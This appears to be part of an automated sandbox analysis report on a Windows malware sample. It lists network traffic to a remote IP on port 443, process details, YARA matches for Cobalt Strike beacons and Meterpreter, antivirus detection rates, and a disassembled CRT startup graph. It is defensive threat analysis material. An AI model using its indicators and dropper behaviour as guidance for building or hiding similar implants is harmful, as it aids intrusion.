                                                                                                                          Aug 5, 2022 09:56:26.559653997 CEST144349793124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:27.067987919 CEST497931443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:27.262059927 CEST144349793124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:27.453006983 CEST498051443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:27.669214964 CEST144349805124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:28.239979029 CEST498051443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:28.455928087 CEST144349805124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:29.052509069 CEST498051443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:29.268527985 CEST144349805124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:29.495060921 CEST498101443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:29.720386982 CEST144349810124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:30.255779982 CEST498101443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:30.481199026 CEST144349810124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:31.068296909 CEST498101443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:31.292104006 CEST144349810124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:31.450253010 CEST498161443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:31.668453932 CEST144349816124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:32.255995035 CEST498161443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:32.475545883 CEST144349816124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:33.068542957 CEST498161443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:33.286715031 CEST144349816124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:33.424062014 CEST498211443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:33.625540972 CEST144349821124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:34.240472078 CEST498211443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:34.441996098 CEST144349821124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:35.053042889 CEST498211443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:35.255081892 CEST144349821124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:35.415158987 CEST498291443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:35.633347034 CEST144349829124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:36.240658045 CEST498291443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:36.458710909 CEST144349829124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:37.053587914 CEST498291443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:37.271845102 CEST144349829124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:37.714510918 CEST498341443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:37.932147026 CEST144349834124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:38.568979025 CEST498341443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:38.786777973 CEST144349834124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:39.365973949 CEST498341443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:39.585803032 CEST144349834124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:43.886779070 CEST498381443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:44.114943027 CEST144349838124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:44.685172081 CEST498381443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:44.914930105 CEST144349838124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:45.569644928 CEST498381443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:45.797305107 CEST144349838124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:45.949325085 CEST498421443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:46.156725883 CEST144349842124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:46.741535902 CEST498421443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:46.947873116 CEST144349842124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:47.554389954 CEST498421443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:47.761111021 CEST144349842124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:48.596637964 CEST498471443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:48.821079016 CEST144349847124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:49.359769106 CEST498471443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:49.577642918 CEST144349847124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:50.172055006 CEST498471443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:50.391778946 CEST144349847124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:50.918701887 CEST498531443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:51.131690979 CEST144349853124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:51.662951946 CEST498531443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:51.875917912 CEST144349853124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:52.562346935 CEST498531443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:52.779340982 CEST144349853124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:52.987561941 CEST498571443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:53.181108952 CEST144349857124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:53.765299082 CEST498571443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:59.767143011 CEST498571443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:59.961982012 CEST144349857124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:00.725454092 CEST498731443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:00.948205948 CEST144349873124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:01.470530987 CEST498731443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:01.694565058 CEST144349873124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:02.267445087 CEST498731443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:02.490175009 CEST144349873124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:06.930372953 CEST498741443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:07.145890951 CEST144349874124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:07.767872095 CEST498741443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:07.983318090 CEST144349874124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:08.529794931 CEST498741443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:20.866230011 CEST498791443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:21.058701038 CEST144349879124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:21.644068003 CEST498791443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:21.836473942 CEST144349879124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:22.459851980 CEST498791443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:22.652327061 CEST144349879124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:23.206902981 CEST498801443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:26.269520044 CEST498801443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:26.497020960 CEST144349880124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:27.160239935 CEST498801443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:27.387630939 CEST144349880124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:30.360735893 CEST498811443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:30.580781937 CEST144349881124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:31.144969940 CEST498811443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:31.365962029 CEST144349881124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:31.957468987 CEST498811443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:32.177411079 CEST144349881124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:32.336950064 CEST498821443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:32.561477900 CEST144349882124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:33.145075083 CEST498821443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:33.369626999 CEST144349882124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:33.957612991 CEST498821443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:47.871036053 CEST498841443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:48.096177101 CEST144349884124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:48.662126064 CEST498841443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:48.887212992 CEST144349884124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:49.474666119 CEST498841443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:49.700737953 CEST144349884124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:54.769370079 CEST498871443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:54.992568970 CEST144349887124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:55.493818998 CEST498871443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:55.714248896 CEST144349887124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:56.262085915 CEST498871443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:56.485327959 CEST144349887124.221.206.154192.168.2.5

                                                                                                                          Statistics

                                                                                                                          CPU Usage

                                                                                                                          Click to jump to process

                                                                                                                          Memory Usage

                                                                                                                          Click to jump to process

                                                                                                                          Behavior

                                                                                                                          Click to jump to process

                                                                                                                          System Behavior

                                                                                                                          General

                                                                                                                          Target ID:0
                                                                                                                          Start time:09:55:44
                                                                                                                          Start date:05/08/2022
                                                                                                                          Path:C:\Users\user\Desktop\1a#U77e5.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Users\user\Desktop\1a#U77e5.exe"
                                                                                                                          Imagebase:0x2a0000
                                                                                                                          File size:4732928 bytes
                                                                                                                          MD5 hash:3F2202E24AD0A66C08F88A18DD7B5FB4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low

                                                                                                                          General

                                                                                                                          Target ID:3
                                                                                                                          Start time:09:55:46
                                                                                                                          Start date:05/08/2022
                                                                                                                          Path:C:\Windows\Temp\????????????.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\Temp\????????????.exe 9gb3vbgeng
                                                                                                                          Imagebase:0x1300000
                                                                                                                          File size:2062848 bytes
                                                                                                                          MD5 hash:84E3D79DA5E503374E61A17351781C14
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Cobaltbaltstrike_Beacon_Encoded, Description: Detects CobaltStrike payloads, Source: 00000003.00000002.706923007.000000C0002D6000.00000004.00001000.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                          • Rule: Cobaltbaltstrike_Beacon_Encoded, Description: Detects CobaltStrike payloads, Source: 00000003.00000002.705984762.000000C000174000.00000004.00001000.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                          • Rule: HKTL_Meterpreter_inMemory, Description: Detects Meterpreter in-memory, Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Author: netbiosX, Florian Roth
                                                                                                                          • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Author: FireEye
                                                                                                                          • Rule: CobaltStrike_Sleep_Decoder_Indicator, Description: Detects CobaltStrike sleep_mask decoder, Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                                                                          • Rule: HKTL_CobaltStrike_SleepMask_Jul22, Description: Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Author: CodeX
                                                                                                                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Cobaltbaltstrike_Beacon_Encoded, Description: Detects CobaltStrike payloads, Source: 00000003.00000002.706488711.000000C00023E000.00000004.00001000.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                          • Rule: HKTL_Meterpreter_inMemory, Description: Detects Meterpreter in-memory, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: netbiosX, Florian Roth
                                                                                                                          • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                          • Rule: Cobaltbaltstrike_Beacon_x64, Description: Detects CobaltStrike payloads, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                          • Rule: CobaltStrike_Sleep_Decoder_Indicator, Description: Detects CobaltStrike sleep_mask decoder, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                                                                          • Rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator, Description: Detects CobaltStrike C2 encoded profile configuration, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                                                                          • Rule: CobaltStrike_MZ_Launcher, Description: Detects CobaltStrike MZ header ReflectiveLoader launcher, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                                                                          • Rule: HKTL_CobaltStrike_SleepMask_Jul22, Description: Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: CodeX
                                                                                                                          • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                          • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: HKTL_Meterpreter_inMemory, Description: Detects Meterpreter in-memory, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: netbiosX, Florian Roth
                                                                                                                          • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                          • Rule: Cobaltbaltstrike_Beacon_x64, Description: Detects CobaltStrike payloads, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                          • Rule: CobaltStrike_Sleep_Decoder_Indicator, Description: Detects CobaltStrike sleep_mask decoder, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                                                                          • Rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator, Description: Detects CobaltStrike C2 encoded profile configuration, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                                                                          • Rule: CobaltStrike_MZ_Launcher, Description: Detects CobaltStrike MZ header ReflectiveLoader launcher, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                                                                          • Rule: HKTL_CobaltStrike_SleepMask_Jul22, Description: Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: CodeX
                                                                                                                          • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                          • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Avira
                                                                                                                          • Detection: 26%, Metadefender, Browse
                                                                                                                          • Detection: 62%, ReversingLabs
                                                                                                                          Reputation:low

                                                                                                                          General

                                                                                                                          Target ID:4
                                                                                                                          Start time:09:55:47
                                                                                                                          Start date:05/08/2022
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff77f440000
                                                                                                                          File size:625664 bytes
                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          General

                                                                                                                          Target ID:5
                                                                                                                          Start time:09:55:47
                                                                                                                          Start date:05/08/2022
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:cmd.exe /c start ?????????????????????.docx
                                                                                                                          Imagebase:0x7ff602050000
                                                                                                                          File size:273920 bytes
                                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          General

                                                                                                                          Target ID:6
                                                                                                                          Start time:09:55:48
                                                                                                                          Start date:05/08/2022
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff77f440000
                                                                                                                          File size:625664 bytes
                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          General

                                                                                                                          Target ID:7
                                                                                                                          Start time:09:55:49
                                                                                                                          Start date:05/08/2022
                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\?????????????????????.docx" /o "
                                                                                                                          Imagebase:0xb60000
                                                                                                                          File size:1937688 bytes
                                                                                                                          MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          Disassembly

                                                                                                                          Reset < >

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:1.2%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:7.9%
                                                                                                                            Total number of Nodes:140
                                                                                                                            Total number of Limit Nodes:23
                                                                                                                            execution_graph 43530 25bf8acc2cc 43531 25bf8acc2e8 _DllMainCRTStartup 43530->43531 43536 25bf8acc378 43531->43536 43541 25bf8acc342 43531->43541 43542 25bf8acc16c 43531->43542 43533 25bf8acc396 43535 25bf8acc3bf 43533->43535 43538 25bf8ac6b54 _DllMainCRTStartup 10 API calls 43533->43538 43537 25bf8acc16c _CRT_INIT 6 API calls 43535->43537 43535->43541 43536->43541 43573 25bf8ac6b54 43536->43573 43537->43541 43539 25bf8acc3b2 43538->43539 43540 25bf8acc16c _CRT_INIT 6 API calls 43539->43540 43540->43535 43543 25bf8acc1fb 43542->43543 43546 25bf8acc17e _heap_init 43542->43546 43544 25bf8acc251 43543->43544 43550 25bf8acc1ff _CRT_INIT 43543->43550 43545 25bf8acc2b4 43544->43545 43552 25bf8acc256 _CRT_INIT 43544->43552 43565 25bf8acc187 _CRT_INIT _mtterm 43545->43565 43607 25bf8ad0218 3 API calls 3 library calls 43545->43607 43546->43565 43577 25bf8ad03c0 43546->43577 43550->43565 43595 25bf8acaa78 RtlDeleteBoundaryDescriptor RtlAllocateHeap RtlAllocateHeap free 43550->43595 43551 25bf8acc227 43551->43565 43596 25bf8ad299c RtlDeleteBoundaryDescriptor RtlAllocateHeap RtlAllocateHeap free 43551->43596 43552->43565 43597 25bf8acf318 43552->43597 43555 25bf8acc193 _RTC_Initialize 43555->43565 43584 25bf8ad32f0 RtlDeleteBoundaryDescriptor RtlAllocateHeap RtlAllocateHeap free _malloc_crt 43555->43584 43556 25bf8acc273 _mtinit 43558 25bf8acc2aa 43556->43558 43559 25bf8acc294 43556->43559 43556->43565 43602 25bf8ac9cd8 43558->43602 43601 25bf8ad02fc 3 API calls 3 library calls 43559->43601 43560 25bf8acc1b5 43585 25bf8ad2670 43560->43585 43564 25bf8acc1c1 43564->43565 43594 25bf8ad2e54 RtlDeleteBoundaryDescriptor RtlAllocateHeap RtlAllocateHeap __initmbctable parse_cmdline 43564->43594 43565->43536 43567 25bf8acc1d1 43568 25bf8acc1e5 43567->43568 43569 25bf8ad3110 _setenvp RtlDeleteBoundaryDescriptor RtlAllocateHeap RtlAllocateHeap 43567->43569 43568->43565 43570 25bf8ad299c _ioterm RtlDeleteBoundaryDescriptor RtlAllocateHeap RtlAllocateHeap 43568->43570 43571 25bf8acc1da 43569->43571 43570->43565 43571->43568 43572 25bf8acabf8 _cinit RtlDeleteBoundaryDescriptor RtlAllocateHeap RtlEncodePointer RtlAllocateHeap 43571->43572 43572->43568 43575 25bf8ac6bd8 43573->43575 43576 25bf8ac6b72 _DllMainCRTStartup 43573->43576 43575->43533 43576->43575 43625 25bf8abca74 43576->43625 43608 25bf8acacb4 RtlEncodePointer 43577->43608 43579 25bf8ad03cb _mtinit _mtinitlocks 43580 25bf8acf318 _calloc_crt 3 API calls 43579->43580 43583 25bf8ad041e _mtterm 43579->43583 43581 25bf8ad03fa _mtinit 43580->43581 43581->43583 43610 25bf8ad02fc 3 API calls 3 library calls 43581->43610 43583->43555 43584->43560 43611 25bf8ace974 43585->43611 43587 25bf8ad269f 43588 25bf8acf318 _calloc_crt RtlDeleteBoundaryDescriptor RtlAllocateHeap RtlAllocateHeap 43587->43588 43592 25bf8ad26b3 43588->43592 43589 25bf8ad26c3 _ioinit _freefls 43589->43564 43590 25bf8acf318 _calloc_crt RtlDeleteBoundaryDescriptor RtlAllocateHeap RtlAllocateHeap 43590->43592 43591 25bf8ad28fe GetFileType 43593 25bf8ad27a4 43591->43593 43592->43589 43592->43590 43592->43593 43593->43589 43593->43591 